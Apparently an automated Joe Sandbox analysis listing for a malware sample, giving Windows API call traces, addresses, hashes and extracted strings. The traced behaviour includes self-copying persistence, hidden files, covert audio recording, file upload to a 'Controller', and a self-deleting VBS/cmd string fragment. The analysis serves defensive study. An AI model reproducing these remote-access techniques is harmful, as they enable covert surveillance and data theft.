                                    • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                    • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                    • CloseHandle.KERNEL32(00000000), ref: 00412576
                                    • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                    • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                    • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                      • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                    • Sleep.KERNEL32(000001F4), ref: 004126BD
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                    • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                    • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                    • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                    • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                    • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                    • SetEvent.KERNEL32 ref: 0041B2AA
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                    • CloseHandle.KERNEL32 ref: 0041B2CB
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                    • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                    • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                    • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                    • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                    • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                    • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000001,00407688,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                    • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                    • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-598482349
                                    • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                    • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                    • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                    • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE42
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                    • _wcslen.LIBCMT ref: 0040CF21
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000000,00000000), ref: 0040CFBF
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                    • _wcslen.LIBCMT ref: 0040D001
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                    • ExitProcess.KERNEL32 ref: 0040D09D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Users\user\AppData\Roaming\keHuNxIumw.exe$del$open
                                    • API String ID: 1579085052-236192539
                                    • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                    • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                    • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                    • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                    • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                    • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                    • _wcslen.LIBCMT ref: 0041C1CC
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                    • GetLastError.KERNEL32 ref: 0041C204
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                    • GetLastError.KERNEL32 ref: 0041C261
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                    • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-3346362794
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                    • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                    • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                    • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                    • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                    • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                    • Sleep.KERNEL32(00000064), ref: 00412ECF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                    • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                    • GetCursorPos.USER32(?), ref: 0041D67A
                                    • SetForegroundWindow.USER32(?), ref: 0041D683
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                    • ExitProcess.KERNEL32 ref: 0041D6F6
                                    • CreatePopupMenu.USER32 ref: 0041D6FC
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                    • __aulldiv.LIBCMT ref: 00408D88
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                    • CloseHandle.KERNEL32(00000000), ref: 00409037
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A77B
                                      • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                      • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                      • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                      • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-3229884001
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045138A
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                      • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                    • _free.LIBCMT ref: 0045137F
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 004513A1
                                    • _free.LIBCMT ref: 004513B6
                                    • _free.LIBCMT ref: 004513C1
                                    • _free.LIBCMT ref: 004513E3
                                    • _free.LIBCMT ref: 004513F6
                                    • _free.LIBCMT ref: 00451404
                                    • _free.LIBCMT ref: 0045140F
                                    • _free.LIBCMT ref: 00451447
                                    • _free.LIBCMT ref: 0045144E
                                    • _free.LIBCMT ref: 0045146B
                                    • _free.LIBCMT ref: 00451483
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    APIs
                                      • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                      • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                      • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                      • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                      • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                    • ExitProcess.KERNEL32 ref: 0040D9FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    APIs
                                      • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                    • GetLastError.KERNEL32 ref: 00455D6F
                                    • __dosmaperr.LIBCMT ref: 00455D76
                                    • GetFileType.KERNEL32(00000000), ref: 00455D82
                                    • GetLastError.KERNEL32 ref: 00455D8C
                                    • __dosmaperr.LIBCMT ref: 00455D95
                                    • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                    • CloseHandle.KERNEL32(?), ref: 00455EFF
                                    • GetLastError.KERNEL32 ref: 00455F31
                                    • __dosmaperr.LIBCMT ref: 00455F38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                    • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                    • __alloca_probe_16.LIBCMT ref: 0044AE40
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                    • __freea.LIBCMT ref: 0044AEB0
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • __freea.LIBCMT ref: 0044AEB9
                                    • __freea.LIBCMT ref: 0044AEDE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                    • String ID: PkGNG$tC
                                    • API String ID: 3864826663-4196309852
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
